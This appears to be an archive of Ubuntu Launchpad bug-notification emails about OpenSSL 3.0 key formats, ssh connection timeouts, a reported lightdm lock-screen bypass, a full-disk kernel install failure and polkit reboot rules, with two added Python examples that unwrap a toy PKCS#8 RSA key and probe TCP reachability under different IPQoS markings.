[Touch-packages] [Bug 1973344] Re: Converting PKCS#8 into PKCS#1 fails with openssl 3.0

2022-05-13 Thread Seth Arnold
** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1973344

Title:
  Converting PKCS#8 into PKCS#1 fails with openssl 3.0

Status in openssl package in Ubuntu:
  New

Bug description:
  On Ubuntu jammy
  with OpenSSL 3.0.2:

  $ openssl rsa -in rsakey.pkcs8 -out rsakey.pkcs1
  writing RSA key

  $ grep -- "-BEGIN" rsakey.pkcs1
  -BEGIN PRIVATE KEY-

  With OpenSSL 1.1.1o or 1.1.1l
  $ openssl rsa -in rsakey.pkcs8 -out rsakey.pkcs1
  writing RSA key

  $ grep -- "-BEGIN" rsakey.pkcs1
  -BEGIN RSA PRIVATE KEY-

  Unfortunately, we still need to be able to generate PKCS #1 private
  keys, as mysqld (8.0.29-0ubuntu0.22.04.2), despite using libssl3, is
  still not capable of loading PKCS #8 private keys.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1973344/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
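
The two PEM headers in bug 1973344 mark two different containers: PKCS#8 wraps the PKCS#1 RSAPrivateKey inside a PrivateKeyInfo structure. The following added example (not code from the bug report or from OpenSSL) shows the unwrapping on a constructed toy key; all function names are hypothetical.

```python
import base64
import re

# DER encoding of OID 1.2.840.113549.1.1.1 (rsaEncryption)
RSA_OID = bytes.fromhex("2a864886f70d010101")
PEM_RE = re.compile(r"-----BEGIN ([A-Z0-9 ]+)-----\s*(.*?)\s*-----END \1-----", re.S)
LABELS = {"RSA PRIVATE KEY": "PKCS#1", "PRIVATE KEY": "PKCS#8",
          "ENCRYPTED PRIVATE KEY": "PKCS#8 (encrypted)"}


def der_tlv(tag, value):
    """Encode one DER tag-length-value element."""
    n = len(value)
    if n < 0x80:
        length = bytes([n])
    else:
        body = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(body)]) + body
    return bytes([tag]) + length + value


def der_int(n):
    """Encode a non-negative INTEGER (extra zero byte when the top bit is set)."""
    return der_tlv(0x02, n.to_bytes(n.bit_length() // 8 + 1, "big"))


def der_read(buf, pos=0):
    """Return (tag, value, next_pos) for the element that starts at pos."""
    if pos + 2 > len(buf):
        raise ValueError("truncated DER")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        n = first & 0x7F
        if n == 0 or pos + n > len(buf):
            raise ValueError("bad DER length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    if pos + length > len(buf):
        raise ValueError("truncated DER")
    return tag, buf[pos:pos + length], pos + length


def pem_decode(text):
    m = PEM_RE.search(text)
    if not m:
        raise ValueError("no PEM block found")
    return m.group(1), base64.b64decode("".join(m.group(2).split()))


def pem_encode(label, der):
    b64 = base64.b64encode(der).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN %s-----\n%s\n-----END %s-----\n" % (label, "\n".join(lines), label)


def key_format(pem_text):
    """Name the container from the PEM label, like the grep in the bug report."""
    label, _ = pem_decode(pem_text)
    return LABELS.get(label, "unknown (%s)" % label)


def pkcs8_to_pkcs1(pem_text):
    """Unwrap an unencrypted PKCS#8 RSA key into a PKCS#1 PEM block."""
    label, der = pem_decode(pem_text)
    if label == "RSA PRIVATE KEY":
        return pem_text                      # already PKCS#1
    if label != "PRIVATE KEY":
        raise ValueError("cannot unwrap PEM label %r" % label)
    tag, body, end = der_read(der)           # PrivateKeyInfo ::= SEQUENCE
    if tag != 0x30 or end != len(der):
        raise ValueError("not a single DER SEQUENCE")
    tag, version, pos = der_read(body)       # version INTEGER (0)
    if tag != 0x02 or version != b"\x00":
        raise ValueError("unexpected PrivateKeyInfo version")
    tag, alg, pos = der_read(body, pos)      # AlgorithmIdentifier
    oid_tag, oid, _ = der_read(alg)
    if tag != 0x30 or oid_tag != 0x06 or oid != RSA_OID:
        raise ValueError("not an RSA key")
    tag, inner, pos = der_read(body, pos)    # OCTET STRING holding RSAPrivateKey
    if tag != 0x04 or der_read(inner)[0] != 0x30:
        raise ValueError("malformed privateKey field")
    return pem_encode("RSA PRIVATE KEY", inner)


def toy_pkcs8_pem():
    """Constructed sample: a textbook-sized RSA key (n = 61 * 53), not a usable key."""
    p, q, e, d = 61, 53, 17, 2753
    fields = (0, p * q, e, d, p, q, d % (p - 1), d % (q - 1), pow(q, -1, p))
    rsa_private_key = der_tlv(0x30, b"".join(der_int(v) for v in fields))
    alg = der_tlv(0x30, der_tlv(0x06, RSA_OID) + der_tlv(0x05, b""))
    info = der_tlv(0x30, der_int(0) + alg + der_tlv(0x04, rsa_private_key))
    return pem_encode("PRIVATE KEY", info)


if __name__ == "__main__":
    pkcs8 = toy_pkcs8_pem()
    print(key_format(pkcs8))
    print(pkcs8_to_pkcs1(pkcs8), end="")
```

With the OpenSSL 3.0 command line, `openssl rsa -traditional` asks for the same PKCS#1 output.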


[Touch-packages] [Bug 1972884] Re: Err:10 https://ppa.launchpadcontent.net/flatpak/stable/ubuntu jammy Release 404 Not Found [IP: 91.189.95.85 443]

2022-05-10 Thread Seth Arnold
Thanks for taking the time to report this bug and helping to make Ubuntu
better. We appreciate the difficulties you are facing, but this appears
to be a "regular" (non-security) bug.  I have unmarked it as a security
issue since this bug does not show evidence of allowing attackers to
cross privilege boundaries nor directly cause loss of data/privacy.
Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to software-properties in
Ubuntu.
https://bugs.launchpad.net/bugs/1972884

Title:
  Err:10 https://ppa.launchpadcontent.net/flatpak/stable/ubuntu jammy
  Release   404  Not Found [IP: 91.189.95.85 443]

Status in software-properties package in Ubuntu:
  New

Bug description:
  Err:10 https://ppa.launchpadcontent.net/flatpak/stable/ubuntu jammy Release 404  Not Found [IP: 91.189.95.85 443]

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1972884/+subscriptions




[Touch-packages] [Bug 1971888] Re: Can not ssh to github.com or gitlab.com when upgrading to 22.04

2022-05-10 Thread Seth Arnold
Alvaro, thanks for reporting back! I'm glad it worked.

I don't know the full details of which QoS settings changed in which
releases, but this email suggests that there was active interest in
changing which exact values were used:
http://lists.mindrot.org/pipermail/openssh-unix-dev/2018-April/036788.html

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1971888

Title:
  Can not ssh to github.com or gitlab.com when upgrading to 22.04

Status in openssh package in Ubuntu:
  Incomplete

Bug description:
  Dear all,

  After the upgrading to Ubuntu 22.04 I can not use git over ssh.

  The best way to reproduce the error is:

  ```
  acs@lsp-022:~$ ssh -vT g...@github.com
  OpenSSH_8.9p1 Ubuntu-3, OpenSSL 3.0.2 15 Mar 2022
  debug1: Reading configuration data /etc/ssh/ssh_config
  debug1: /etc/ssh/ssh_config line 19: include /etc/ssh/ssh_config.d/*.conf matched no files
  debug1: /etc/ssh/ssh_config line 21: Applying options for *
  debug1: Connecting to github.com [140.82.121.4] port 22.
  debug1: connect to address 140.82.121.4 port 22: Connection timed out
  ```

  Before the upgrading I can connect correctly with:

  ```
  ssh -vT g...@github.com
  OpenSSH_8.2p1 Ubuntu-4ubuntu0.4, OpenSSL 1.1.1f  31 Mar 2020
  debug1: Reading configuration data /etc/ssh/ssh_config
  debug1: /etc/ssh/ssh_config line 21: include /etc/ssh/ssh_config.d/*.conf matched no files
  debug1: /etc/ssh/ssh_config line 23: Applying options for *
  debug1: Connecting to github.com [140.82.121.4] port 22.
  debug1: Connection established
  ```

  The same issue is happening with gitlab.com.

  Probably it is related with the OpenSSL version.

  Cheers!

  -- Alvaro

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: ssh 1:8.9p1-3
  ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30
  Uname: Linux 5.15.0-27-generic x86_64
  ApportVersion: 2.20.11-0ubuntu82
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: GNOME
  Date: Thu May  5 23:00:33 2022
  InstallationDate: Installed on 2021-03-08 (423 days ago)
  InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 (20210209.1)
  PackageArchitecture: all
  SourcePackage: openssh
  UpgradeStatus: Upgraded to jammy on 2022-05-05 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1971888/+subscriptions




[Touch-packages] [Bug 1971888] Re: Can not ssh to github.com or gitlab.com when upgrading to 22.04

2022-05-09 Thread Seth Arnold
Alvaro, I wonder if your network is dropping packets with unexpected IP
QoS flags? Look for 'IPQoS' in ssh_config(5) to see the defaults and
available choices. This would be influenced by ssh settings but still
operate at TCP level.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1971888

Title:
  Can not ssh to github.com or gitlab.com when upgrading to 22.04

Status in openssh package in Ubuntu:
  Incomplete

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1971888/+subscriptions




[Touch-packages] [Bug 1972114]

2022-05-09 Thread Seth Arnold
Thanks for taking the time to report this bug and helping to make Ubuntu
better. Since the package referred to in this bug is in universe or
multiverse, it is community maintained. If you are able, I suggest
coordinating with upstream and posting a debdiff for this issue. When a
debdiff is available, members of the security team will review it and
publish the package. See the following link for more information:
https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures

** Tags added: community-security

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lightdm in Ubuntu.
https://bugs.launchpad.net/bugs/1972114

Title:
  Pressing Ctl Alt F7 allows me to bypass lock screen

Status in lightdm package in Ubuntu:
  New

Bug description:
  When I hit Ctl Alt f7 after locking the screen or starting the pc up
  from a suspended state it just takes me to my desktop without
  requiring a password.

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: lightdm 1.30.0-0ubuntu5
  ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30
  Uname: Linux 5.15.0-27-generic x86_64
  NonfreeKernelModules: nvidia_modeset nvidia
  ApportVersion: 2.20.11-0ubuntu82
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: ubuntu:GNOME
  Date: Sun May  8 20:35:50 2022
  InstallationDate: Installed on 2022-03-12 (57 days ago)
  InstallationMedia: Ubuntu 20.04.4 LTS "Focal Fossa" - Release amd64 (20220223)
  SourcePackage: lightdm
  UpgradeStatus: Upgraded to jammy on 2022-04-29 (8 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1972114/+subscriptions




[Touch-packages] [Bug 1608200] Re: please merge openssl from Debian

2022-05-09 Thread Seth Arnold
** Changed in: openssl (Ubuntu)
   Status: Incomplete => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1608200

Title:
  please merge openssl from Debian

Status in openssl package in Ubuntu:
  Fix Released

Bug description:
  I'm not aware of any ABI breakages, but I bumped the shlibs min
  version anyway.

  Please triple check
  + dh_makeshlibs -a -V "libssl1.0.0 (>= 1.0.2h)" 
--add-udeb="libcrypto1.0.0-udeb" -Xengines

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1608200/+subscriptions




[Touch-packages] [Bug 1971221] Re: firefox is flashing

2022-05-06 Thread Seth Arnold
Thanks for taking the time to report this bug and helping to make Ubuntu
better. We appreciate the difficulties you are facing, but this appears
to be a "regular" (non-security) bug.  I have unmarked it as a security
issue since this bug does not show evidence of allowing attackers to
cross privilege boundaries nor directly cause loss of data/privacy.
Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1971221

Title:
  firefox  is flashing

Status in xorg package in Ubuntu:
  New

Bug description:
  When the Firefox window is behind other app windows, it is flashing.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1971221/+subscriptions




[Touch-packages] [Bug 1971101] Re: package linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1

2022-05-06 Thread Seth Arnold
Hello, note your filesystem is full:

Filesystem 1K-blocks     Used Available Use% Mounted on
udev          981292        0    981292   0% /dev
tmpfs         202808     1508    201300   1% /run
/dev/sda5   11167656 11000192         0 100% /

That causes errors like this:

cp: error writing '/var/tmp/mkinitramfs_jx7Z98//usr/bin/kmod': No space left on device
cp: error writing '/var/tmp/mkinitramfs_jx7Z98//usr/lib/x86_64-linux-gnu/liblzma.so.5.2.4': No space left on device
mkdir: cannot create directory ‘/var/tmp/mkinitramfs_jx7Z98/etc/modprobe.d’: No space left on device
mkdir: cannot create directory ‘/var/tmp/mkinitramfs_jx7Z98/lib/modprobe.d’: No space left on device
mkdir: cannot create directory ‘/var/tmp/mkinitramfs_jx7Z98//etc/modprobe.d’: No space left on device

These errors are preventing your system update from finishing.

Free up some space on the root filesystem, and then try:

sudo apt install -f
or
sudo dpkg --configure -a

The full screen issue may require talking with VirtualBox support.

Thanks

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1971101

Title:
  package linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1 failed to
  install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools
  exited with return code 1

Status in initramfs-tools package in Ubuntu:
  New

Bug description:
  Slow system. I get notified all the time. Oh, by the way, I need help
  getting this virtual screen to go back full screen. Thanks!

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1
  ProcVersionSignature: Ubuntu 5.11.0-41.45~20.04.1-generic 5.11.22
  Uname: Linux 5.11.0-41-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.21
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Sun May  1 01:38:42 2022
  ErrorMessage: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1
  InstallationDate: Installed on 2021-10-01 (212 days ago)
  InstallationMedia: Ubuntu 20.04.3 LTS "Focal Fossa" - Release amd64 (20210819)
  Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 3.8.2-0ubuntu2
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.6
  SourcePackage: initramfs-tools
  Title: package linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/1971101/+subscriptions




Re: [Touch-packages] [Bug 1971888] [NEW] Can not ssh to github.com or gitlab.com when upgrading to 22.04

2022-05-05 Thread Seth Arnold
On Thu, May 05, 2022 at 09:09:07PM -, Alvaro wrote:
> acs@lsp-022:~$ ssh -vT g...@github.com
> ...
> debug1: connect to address 140.82.121.4 port 22: Connection timed out

Note that "Connection timed out" is an error at the TCP level, that
indicates that your computer wasn't able to establish a TCP session. ssh's
algorithm choices aren't involved yet.

Are you sure this machine can communicate with 140.82.121.4:22 at all?

$ nc 140.82.112.4 22
SSH-2.0-babeld-78a8149e
^C

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1971888

Title:
  Can not ssh to github.com or gitlab.com when upgrading to 22.04

Status in openssh package in Ubuntu:
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1971888/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
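
The replies on bug 1971888 make two points: "Connection timed out" happens at the TCP level, before any ssh algorithm is chosen, and the network may be dropping packets that carry unexpected IP QoS flags. The following added example (not part of the thread and not OpenSSH code) separates those cases by connecting with several TOS bytes and reporting how far each attempt gets; the function names and the local banner server used as a constructed target are assumptions.

```python
import errno
import socket
import threading

# TOS byte (DSCP << 2) for some keywords that ssh_config(5) accepts for IPQoS.
IPQOS_TOS = {"unmarked": 0x00, "lowdelay": 0x10, "throughput": 0x08,
             "af21": 0x48, "cs1": 0x20}


def probe(host, port, tos, timeout=5.0):
    """Make one IPv4 TCP connection with the given TOS byte; return (stage, detail)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        # Mark the socket before connect() so the SYN already carries the value.
        sock.setsockopt(socket.IPPROTO_IP, socket.IP_TOS, tos)
        try:
            sock.connect((host, port))
        except socket.timeout:
            return ("tcp-timeout", "no answer to SYN within %.1fs" % timeout)
        except ConnectionRefusedError:
            return ("tcp-refused", "peer or firewall answered with RST")
        except OSError as exc:
            return ("tcp-error", errno.errorcode.get(exc.errno, str(exc)))
        try:
            banner = sock.recv(255)
        except OSError as exc:
            return ("no-banner", "TCP connected, no data: %s" % exc)
        if not banner:
            return ("no-banner", "TCP connected, peer closed without data")
        first_line = banner.split(b"\n")[0].strip()
        return ("banner", first_line.decode("ascii", "replace"))
    finally:
        sock.close()


def compare_ipqos(host, port=22, timeout=5.0):
    """Probe once per marking and summarise whether the marking matters."""
    results = {name: probe(host, port, tos, timeout)
               for name, tos in IPQOS_TOS.items()}
    stages = {stage for stage, _ in results.values()}
    if stages == {"banner"}:
        verdict = "reachable with every marking"
    elif "banner" in stages:
        verdict = "path treats markings differently; pick a working IPQoS value"
    else:
        verdict = "unreachable with every marking; not an IPQoS problem"
    return results, verdict


def start_banner_server(banner=b"SSH-2.0-constructed_demo\r\n"):
    """Constructed local target: sends a banner to each client, then closes."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], srv


if __name__ == "__main__":
    port, _srv = start_banner_server()
    results, verdict = compare_ipqos("127.0.0.1", port, timeout=2.0)
    for name, (stage, detail) in results.items():
        print("%-10s 0x%02x  %-11s %s" % (name, IPQOS_TOS[name], stage, detail))
    print(verdict)
```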


[Touch-packages] [Bug 1971650] Re: wrong check for "server" in libssl3.postinst

2022-05-05 Thread Seth Arnold
Possibly related to https://bugs.launchpad.net/bugs/1832421

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1971650

Title:
  wrong check for "server" in libssl3.postinst

Status in openssl package in Ubuntu:
  New

Bug description:
  A security update has just been applied to my system for openssl, and
  the 'reboot required' message just popped on my desktop.  I looked to
  see why this was, and found the following code in the libssl3
  postinst:

  # Here we issue the reboot notification for upgrades and
  # security updates. We do want services to be restarted when we
  # update for a security issue, but planned by the sysadmin, not
  # automatically.

  # Only issue the reboot notification for servers; we proxy this by
  # testing that the X server is not running (LP: #244250)
  if ! pidof /usr/lib/xorg/Xorg > /dev/null && [ -x /usr/share/update-notifier/notify-reboot-required ]; then
      /usr/share/update-notifier/notify-reboot-required
  fi

  Now, AFAIK this is the only package that interfaces with
  notify-reboot-required but omits the notification on desktops, so that seems
  to be an inconsistent policy; but even if we thought that was the
  correct policy to apply, the above check for a desktop is not because
  it doesn't match in the case the user is running Xwayland, which most
  users not using the nvidia driver will be doing now by default.

  Also, this is now inside a block that checks for the presence of
  needrestart, which is part of the server seed; so in effect this
  notification now *never* fires on servers, it *only* fires on
  desktops.

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: openssl 3.0.2-0ubuntu1.1
  ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30
  Uname: Linux 5.15.0-27-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu82
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: ubuntu:GNOME
  Date: Thu May  5 05:39:06 2022
  InstallationDate: Installed on 2019-12-23 (863 days ago)
  InstallationMedia: Ubuntu 19.10 "Eoan Ermine" - Release amd64 (20191017)
  RebootRequiredPkgs: Error: path contained symlinks.
  SourcePackage: openssl
  UpgradeStatus: Upgraded to jammy on 2022-04-15 (19 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1971650/+subscriptions




[Touch-packages] [Bug 1963834] Re: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]

2022-04-26 Thread Seth Arnold
Yes, managing the configurations for the huge variety of cryptography
toolkits on a Linux system is definitely something of a chore. It would
be nice to give people one command they could use to return to
unsafe-but-compatible cryptography -- or enforce only modern cryptography.

Our friends at Red Hat have prepared
https://gitlab.com/redhat-crypto/fedora-crypto-policies -- while a
version of this is packaged:
https://launchpad.net/ubuntu/+source/crypto-policies -- I don't believe
it actually works on Ubuntu:
https://bugs.launchpad.net/ubuntu/+source/crypto-policies/+bug/1926664

Maybe someday.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1963834

Title:
  openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]

Status in openssl package in Ubuntu:
  Won't Fix

Bug description:
  Description:Ubuntu Jammy Jellyfish (development branch)
  Release:22.04

  openssl:
Installé : 3.0.1-0ubuntu1
Candidat : 3.0.1-0ubuntu1
   Table de version :
   *** 3.0.1-0ubuntu1 500
  500 http://ca.archive.ubuntu.com/ubuntu jammy/main amd64 Packages
  100 /var/lib/dpkg/status

  Using Ubuntu 22.04, I now get the following error message when
  attempting to connect to our office VPN using "gp-saml-gui
  (https://github.com/dlenski/gp-saml-gui)" :

  #
  dominique@Doombuntu:~$ .local/bin/gp-saml-gui  server_url
  Looking for SAML auth tags in response to https://server_url/global-protect/prelogin.esp...
  usage: gp-saml-gui [-h] [--no-verify] [-C COOKIES | -K] [-g | -p] [-c CERT] [--key KEY] [-v | -q] [-x | -P | -S] [-u] [--clientos {Windows,Linux,Mac}] [-f EXTRA] server [openconnect_extra ...]
  gp-saml-gui: error: SSL error: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997)
  #
  #
  #

  gp-saml-gui uses python module requests.
  Using python ide, I can get the same results  :

  #
  >>> r = requests.get('https://server_url')
  Traceback (most recent call last):
    File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 699, in urlopen
      httplib_response = self._make_request(
    File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 382, in _make_request
      self._validate_conn(conn)
    File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 1012, in _validate_conn
      conn.connect()
    File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 411, in connect
      self.sock = ssl_wrap_socket(
    File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 449, in ssl_wrap_socket
      ssl_sock = _ssl_wrap_socket_impl(
    File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 493, in _ssl_wrap_socket_impl
      return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
    File "/usr/lib/python3.10/ssl.py", line 512, in wrap_socket
      return self.sslsocket_class._create(
    File "/usr/lib/python3.10/ssl.py", line 1070, in _create
      self.do_handshake()
    File "/usr/lib/python3.10/ssl.py", line 1341, in do_handshake
      self._sslobj.do_handshake()
  ssl.SSLError: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997)

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
    File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in send
      resp = conn.urlopen(
    File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 755, in urlopen
      retries = retries.increment(
    File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 574, in increment
      raise MaxRetryError(_pool, url, error or ResponseError(cause))
  urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='server_url', port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, '[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997)')))

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
    File "", line 1, in 
    File "/usr/lib/python3/dist-packages/requests/api.py", line 76, in get
      return request('get', url, params=params, **kwargs)
    File "/usr/lib/python3/dist-packages/requests/api.py", line 61, in request
      return session.request(method=method, url=url, **kwargs)
    File "/usr/lib/python3/dist-packages/requests/sessions.py", line 542, in request
      resp = self.send(prep, **send_kwargs)
    File "/usr/lib/python3/dist-packages/requests/sessions.py", line 655, in send
      r = adapter.send(request, **kwargs)
    File "/usr/lib/python3/dist-packages/requests/adapters.py", line 514, in send
      raise SSLError(e, request=request)
  requests.exceptions.SSLError: HTTPSConnectionPool(host='server_url', port=443): Max retries

[Touch-packages] [Bug 1970459] Re: import of ca-certificate in browser does not work

2022-04-26 Thread Seth Arnold
I switched this from ca-certificates to firefox and chromium-browser,
since both browsers manage their own certificate lists and don't use the
system-provided ca-certificates. (You manage that with different tools,
see the first few lines of /etc/ca-certificates.conf for details.)

Thanks

** Package changed: ca-certificates (Ubuntu) => firefox (Ubuntu)

** Also affects: chromium-browser (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ca-certificates in Ubuntu.
https://bugs.launchpad.net/bugs/1970459

Title:
  import of ca-certificate in browser does not work

Status in chromium-browser package in Ubuntu:
  New
Status in firefox package in Ubuntu:
  New

Bug description:
  I tried to import a CA root certificate into both Firefox and Chrome.
  In Firefox, the import button just didn't do anything, in Chrome
  pressing "import" hangs up the browser. This means I can't reach the
  intranet of the company I work for.

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: ca-certificates 20211016
  ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30
  Uname: Linux 5.15.0-27-generic x86_64
  NonfreeKernelModules: nvidia_modeset nvidia
  ApportVersion: 2.20.11-0ubuntu82
  Architecture: amd64
  CasperMD5CheckResult: pass
  CurrentDesktop: ubuntu:GNOME
  Date: Tue Apr 26 19:16:12 2022
  InstallationDate: Installed on 2022-04-23 (3 days ago)
  InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 (20220419)
  PackageArchitecture: all
  SourcePackage: ca-certificates
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1970459/+subscriptions




[Touch-packages] [Bug 1969593] Re: rules to prevent non-root users from rebooting not taken into account

2022-04-20 Thread Seth Arnold
** Also affects: systemd (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1969593

Title:
  rules to prevent non-root users from rebooting not taken into account

Status in policykit-1 package in Ubuntu:
  New
Status in systemd package in Ubuntu:
  New

Bug description:
  On fresh Ubuntu Jammy installation, I add a
  "/etc/polkit-1/localauthority/90-mandatory.d/restriction.pkla" file with the
  following contents:
  [Disable power-off]
  Identity=unix-user:*
  Action=org.freedesktop.login1.power-off
  ResultActive=no
  ResultInactive=no
  ResultAny=no

  [Disable power-off when others are logged in]
  Identity=unix-user:*
  Action=org.freedesktop.login1.power-off-multiple-sessions
  ResultActive=no
  ResultInactive=no
  ResultAny=no

  [Disable_reboot]
  Identity=unix-user:*
  Action=org.freedesktop.login1.reboot
  ResultActive=no
  ResultInactive=no
  ResultAny=no

  [Disable_reboot_when_others_are_logged_in]
  Identity=unix-user:*
  Action=org.freedesktop.login1.reboot-multiple-sessions
  ResultActive=no
  ResultInactive=no
  ResultAny=no


  
  It must prevent non-root users from shutting down and rebooting the system. But
  it only prevents shutting down. Rebooting is still possible for a non-root user.

  We can see it using the pkcheck command (as a non-root user):
  $ pkcheck --action-id org.freedesktop.login1.power-off --process $PPID ; echo $?
  Not authorized.
  1
  $ pkcheck --action-id org.freedesktop.login1.reboot --process $PPID ; echo $?
  0

  As this problem can lead to unexpected reboots on multi-user systems (an
  availability concern), I checked the "This bug is a security vulnerability" box.

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: policykit-1 0.105-33
  ProcVersionSignature: Ubuntu 5.15.0-25.25-generic 5.15.30
  Uname: Linux 5.15.0-25-generic x86_64
  ApportVersion: 2.20.11-0ubuntu82
  Architecture: amd64
  CasperMD5CheckResult: pass
  CurrentDesktop: ubuntu:GNOME
  Date: Wed Apr 20 10:53:27 2022
  InstallationDate: Installed on 2022-04-20 (0 days ago)
